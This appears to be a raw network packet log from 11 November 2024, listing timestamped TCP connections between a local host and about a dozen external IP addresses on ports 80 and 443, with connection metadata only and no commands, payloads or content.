                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.256926060 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257013083 CET8059221154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257673025 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257725000 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.258290052 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.259053946 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260509014 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260749102 CET5921780192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260786057 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.263863087 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265377998 CET8059223188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265579939 CET8059217208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265639067 CET5921780192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.660737038 CET8059214178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.660834074 CET5921480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685470104 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685560942 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685672998 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685857058 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685869932 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685966969 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689420938 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689449072 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689589024 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689589024 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.691929102 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.691992998 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692043066 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692086935 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692364931 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692439079 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692476034 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692529917 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692583084 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692643881 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.695494890 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.695564032 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.698400974 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.698458910 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.786689997 CET8059220162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.788733959 CET5922080192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.028939962 CET8059223188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.029010057 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.071836948 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.074873924 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.077430010 CET8059225162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.077531099 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.080318928 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.080375910 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.143194914 CET8059221154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.143279076 CET5922180192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702663898 CET8059212199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702774048 CET5921280192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.951888084 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.952080965 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.957079887 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.957298994 CET8059225162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.046267986 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.046753883 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.054424047 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.054481030 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.123919964 CET8059225162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.128721952 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.515131950 CET5923080192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.515762091 CET5923180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.520380974 CET805923018.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.520467043 CET5923080192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.520931959 CET80592313.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.520992041 CET5923180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.131247997 CET8050243162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.131412029 CET5024380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.091411114 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.426836014 CET805923318.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.427021980 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.485188007 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.490437031 CET805923318.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.853944063 CET805923318.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.854008913 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.861175060 CET805923318.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.861221075 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.638202906 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.638834000 CET5923680192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.639508009 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.643707991 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.643722057 CET8059236154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.643763065 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.643784046 CET5923680192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.644206047 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.644757986 CET5923680192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645051956 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645102978 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645417929 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.645505905 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.646195889 CET5923980192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.649141073 CET8059238178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.649195910 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.649336100 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.649606943 CET8059236154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.650511026 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.650566101 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.651443958 CET8059239188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.651499987 CET5923980192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.651628971 CET5923980192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.655284882 CET8059238178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.657234907 CET8059239188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.693844080 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.694278955 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.698853016 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.698932886 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.699687958 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.699759960 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.699893951 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.705960989 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.719090939 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.724006891 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292481899 CET8059238178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292500973 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292531013 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292568922 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292581081 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292592049 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292613983 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292615891 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292625904 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292635918 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292654991 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292671919 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292686939 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292696953 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292709112 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292749882 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292773008 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292824984 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.293023109 CET8059238178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.293066025 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.293886900 CET5923880192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.293987989 CET5923580192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.298703909 CET8059238178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.298815012 CET805923599.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.334598064 CET8059239188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.334665060 CET5923980192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.630713940 CET8059236154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.630829096 CET5923680192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.866053104 CET59248443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.866111040 CET4435924899.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.866231918 CET59248443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.873492956 CET8059236154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.873553038 CET5923680192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.892924070 CET59249443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.892932892 CET44359249188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.893009901 CET59249443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.907329082 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912157059 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912571907 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912707090 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.917849064 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.115030050 CET59248443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.115072012 CET4435924899.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.115223885 CET59249443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.115236044 CET44359249188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.236136913 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.237538099 CET5923780192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.238265038 CET5923380192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.239396095 CET5924180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.239774942 CET5925180192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.240983009 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.242557049 CET805923744.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.243242979 CET805923318.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.244688988 CET80592413.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.245570898 CET8059251208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.245641947 CET5925180192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.297416925 CET5923080192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.297458887 CET5923180192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.742242098 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.742635012 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.743947029 CET44359249188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.744035006 CET59249443192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.744369984 CET4435924899.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.744431019 CET59248443192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.818945885 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819029093 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819045067 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819106102 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819148064 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819500923 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819513083 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819524050 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819538116 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.819585085 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820456028 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820472002 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820483923 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820493937 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820508003 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820540905 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824218988 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824315071 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824326038 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824378014 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907629967 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907691002 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907766104 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907778978 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907819033 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907849073 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908184052 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908199072 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908241987 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908257008 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908576965 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908590078 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908629894 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908997059 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909008980 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909022093 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909049034 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909065962 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199882984 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199942112 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199954987 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200016975 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200155973 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200351954 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200366020 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200397968 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200409889 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200726032 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200737953 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200750113 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200762987 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200776100 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200802088 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205306053 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205399036 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205409050 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205451965 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282188892 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282282114 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282295942 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282334089 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282375097 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282630920 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282644033 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282681942 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.283970118 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284198999 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284243107 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284334898 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284347057 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284384966 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284682989 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284694910 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284708977 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284735918 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284744024 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285439014 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285450935 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285463095 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285475969 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285489082 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285495996 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285518885 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285545111 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286168098 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286183119 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286195040 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286220074 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286231041 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286592960 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286609888 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286623001 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286643982 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286672115 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.287494898 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.287544966 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363358974 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363420963 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363441944 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363471985 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.464205980 CET8059203162.255.119.102192.168.2.6
